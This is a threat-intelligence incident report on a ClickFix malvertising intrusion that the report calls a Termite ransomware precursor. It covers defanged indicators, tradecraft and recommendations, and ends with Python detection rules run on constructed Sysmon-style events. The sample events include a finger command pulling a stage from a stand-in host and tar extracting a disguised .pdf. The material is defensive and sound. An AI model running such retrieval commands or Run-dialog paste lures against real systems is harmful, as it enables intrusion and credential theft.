Full Report
During a 12-day Deception.Pro operation, researchers observed a high-severity, multi-stage intrusion chain that began with malvertising and a ClickFix-style fake CAPTCHA. The lure instructed the victim to paste an obfuscated command into the Windows Run dialog. That single action spawned nested cmd.exe execution, tested outbound connectivity using finger.exe (TCP/79), and pulled a masqueraded “PDF” from attacker infrastructure. The downloaded file was not a normal document; it behaved like a compressed archive and was extracted locally using built-in Windows tooling. From there, the actor executed multiple PowerShell download-and-execute stages (IEX) from attacker-controlled domains, dynamically compiled .NET payloads using csc.exe from user temp directories, and deployed Python-based components under C:\ProgramData for persistence. Follow-on activity included Active Directory reconnaissance (domain trusts, server discovery, user listing) and attempted browser credential harvesting via a PowerShell script downloaded from 143.198.160[.]37.
Analysis Summary
# Incident Report: Velvet Tempest ClickFix to Termite Ransomware Precursor
## Executive Summary
Between February 3 and February 16, 2026, researchers monitored a 12-day multi-stage intrusion targeting a non-profit organization’s Active Directory environment. The attack utilized "ClickFix" malvertising to trick users into executing obfuscated commands, leading to the deployment of loaders, CastleRAT, and extensive hands-on-keyboard reconnaissance. The activity is attributed to **Velvet Tempest (DEV-0504)** and is identified as a precursor to **Termite Ransomware** deployment.
## Incident Details
- **Discovery Date:** February 3, 2026
- **Incident Date:** February 3 – February 16, 2026
- **Affected Organization:** AI-generated replica (Non-profit Aid Organization)
- **Sector:** Non-Profit / Humanitarian Tech
- **Geography:** United States
## Timeline of Events
### Initial Access
- **Date/Time:** 2026-02-03 17:38:57
- **Vector:** Malvertising / ClickFix Social Engineering
- **Details:** A victim was prompted by a fake CAPTCHA to "verify they are human" by pasting an obfuscated command into the Windows Run dialog. This executed a command connecting to `finger[.]h3securecloud[.]com`.
### Lateral Movement & Reconnaissance
- **Reconnaissance:** Actors used `nltest /domain_trusts`, `net user /domain`, and `get-psdrive` to map the Active Directory environment.
- **Payload Staging:** The actor moved from initial loaders to DonutLoader and CastleRAT, compiling .NET payloads on-the-fly using `csc.exe`.
### Data Exfiltration/Impact
- **Impact:** Attempted credential harvesting from Google Chrome via a PowerShell script (`chrome_pass.txt`).
- **Ransomware Precursor:** While no encryption occurred during the 12-day window, the activity mirrors known Termite Ransomware staging patterns.
### Detection & Response
- **Detection:** Identified via Deception.Pro monitoring of a replica environment.
- **Response Actions:** Observation of attacker tradecraft for intelligence gathering; identification of previously unknown C2 infrastructure and file hashes.
## Attack Methodology
- **Initial Access:** ClickFix (Social Engineering + Windows Run dialog).
- **Persistence:** Python-based components deployed under `C:\ProgramData` and CastleRAT foothold.
- **Privilege Escalation:** Not explicitly detailed, but involved AD domain admin reconnaissance.
- **Defense Evasion:** Use of LOLBins (`finger.exe`, `curl.exe`, `tar.exe`), masquerading archives as `.pdf` files, and on-host compilation via `csc.exe` to avoid signature-based detection.
- **Credential Access:** Browser credential harvesting via PowerShell script (Invoke-PowerChrome-like functionality).
- **Discovery:** AD trust discovery, user listing, and server discovery.
- **Lateral Movement:** Hands-on-keyboard (HoK) interaction and staging for wider deployment.
- **Collection:** Automated gathering of browser-stored credentials.
- **Exfiltration:** Potential C2 channels via `.life` and `.org` domains.
- **Impact:** Intelligence suggests a final stage of Termite Ransomware.
## Impact Assessment
- **Financial:** High potential (Ransomware risk); actual cost minimized by deception environment.
- **Data Breach:** Attempted theft of browser credentials across the environment.
- **Operational:** Threat to 3,000+ endpoints and 2,500+ users.
- **Reputational:** High risk for a non-profit handling sensitive aid distribution data.
## Indicators of Compromise
- **Network Indicators:**
- `h3securecloud[.]com`
- `vrstudio[.]life`
- `gamestudio[.]life`
- `grtrip[.]org`
- `143.198.160[.]37`
- **File Indicators:**
- `chrome_pass.txt`
- `volccpfs.cmdline`
- `__init__.py` (in `C:\ProgramData\AndronFolder\`)
- **Behavioral Indicators:**
- Outbound traffic on TCP/79 (`finger.exe`).
- Unexpected `csc.exe` execution in user `Temp` directories.
- `tar.exe` extracting masqueraded `.pdf` files.
## Response Actions
- **Containment:** Blocked associated attacker domains and IP addresses.
- **Eradication:** Removal of Python scripts and .NET artifacts from `C:\ProgramData` and `Temp` folders.
- **Recovery:** Identification of all endpoints interacting with the ClickFix lures for credential resets.
## Lessons Learned
- **The "Human" Factor:** Attackers are bypassing browser security controls by moving the social engineering lure out of the browser and into the Windows Run dialog (copy/paste), a step most web-filtering and browser protections never see.
- **LOLBins:** Traditional security monitoring often ignores native tools like `finger.exe` or `tar.exe`, which were central to this stage-1 retrieval.
- **Staging Speed:** The transition from initial click to hands-on-keyboard reconnaissance was rapid, highlighting the need for fast automated response.
## Recommendations
- **Restrict LOLBins:** Implement AppLocker or Windows Defender Application Control (WDAC) to block or log high-risk binaries like `finger.exe` and `csc.exe` for standard users.
- **User Training:** Specifically warn users against "Copy-Paste" lures from websites asking them to use the Windows Run (`Win+R`) box.
- **Monitor Temp Directories:** Alert on the creation of `.cmdline` files or execution of `csc.exe` originating from `%TEMP%` subfolders.
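The behavioral indicators listed above and the "Monitor Temp Directories" recommendation translate directly into detection logic. The following is an added example, not tooling from the report or from Deception.Pro: five rules run over constructed Sysmon-style events (EventID 1 process create, 3 network connect, 11 file create, with Sysmon field names such as `Image`, `ParentImage`, `CommandLine`, `DestinationPort` and `TargetFilename`). Every sample value below (user name, paths, IP, response-file name) is constructed for illustration and is not telemetry from the incident.

```python
"""Detection rules for the behavioural indicators in this report, applied to
constructed Sysmon-style events (dict per event; EventID 1 = process create,
3 = network connect, 11 = file create). Added example, not the report's tooling;
all sample values are constructed."""
import re

# A user Temp directory, either as a path fragment or via the %TEMP% variable.
TEMP_DIR = re.compile(r"(%temp%|\\users\\[^\\]+\\appdata\\local\\temp)\\", re.I)
# Stage-1 retrieval LOLBins named in the report (word-bounded so "start" != "tar").
LOLBIN = re.compile(r"\b(finger|curl|tar)(\.exe)?\b", re.I)


def _image_is(ev, name):
    return ev.get("Image", "").lower().endswith("\\" + name)


def run_dialog_lolbin(ev):
    """cmd.exe spawned directly by explorer.exe (the Win+R Run dialog) that calls a retrieval LOLBin."""
    return (ev.get("EventID") == 1
            and _image_is(ev, "cmd.exe")
            and ev.get("ParentImage", "").lower().endswith("\\explorer.exe")
            and LOLBIN.search(ev.get("CommandLine", "")) is not None)


def finger_egress(ev):
    """Any process opening TCP/79: finger.exe was used for the connectivity check and retrieval."""
    return (ev.get("EventID") == 3
            and str(ev.get("Protocol", "")).lower() == "tcp"
            and ev.get("DestinationPort") == 79)


def tar_pdf(ev):
    """tar.exe asked to extract something named .pdf: the masqueraded archive."""
    return (ev.get("EventID") == 1
            and _image_is(ev, "tar.exe")
            and ".pdf" in ev.get("CommandLine", "").lower())


def cmdline_in_temp(ev):
    """A .cmdline compiler response file written under a user Temp directory."""
    target = ev.get("TargetFilename", "")
    return (ev.get("EventID") == 11
            and target.lower().endswith(".cmdline")
            and TEMP_DIR.search(target) is not None)


def csc_from_temp(ev):
    """csc.exe compiling from a response file that lives in a user Temp directory."""
    return (ev.get("EventID") == 1
            and _image_is(ev, "csc.exe")
            and TEMP_DIR.search(ev.get("CommandLine", "")) is not None)


RULES = (run_dialog_lolbin, finger_egress, tar_pdf, cmdline_in_temp, csc_from_temp)


def run_rules(events):
    """Return (event_index, rule_name) for every rule that fires on every event."""
    hits = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            if rule(ev):
                hits.append((idx, rule.__name__))
    return hits


# Constructed sample telemetry: five events mirroring the report's chain, then two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c finger stage@finger.example.invalid"},
    {"EventID": 3, "Image": r"C:\Windows\System32\finger.exe", "Protocol": "tcp",
     "DestinationIp": "203.0.113.10", "DestinationPort": 79},
    {"EventID": 1, "Image": r"C:\Windows\System32\tar.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"tar -xf C:\Users\alice\Downloads\report.pdf -C C:\Users\alice\AppData\Local\Temp\stage"},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\k2m9x\k2m9x.cmdline"},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'csc.exe /noconfig /fullpaths @"C:\Users\alice\AppData\Local\Temp\k2m9x\k2m9x.cmdline"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "Protocol": "tcp",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
]

if __name__ == "__main__":
    for idx, name in run_rules(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx}: {name}: {ev.get('CommandLine') or ev.get('TargetFilename') or ev.get('Image')}")
```

The `run_dialog_lolbin` rule keys on the parent being `explorer.exe`, which is what a command pasted into the Run dialog looks like in process telemetry; a developer running `tar` from a terminal has a different parent and will not fire it. The two Temp-directory rules are deliberately separate because the `.cmdline` file write (EventID 11) often precedes the `csc.exe` launch by milliseconds and either one alone is enough to page an analyst.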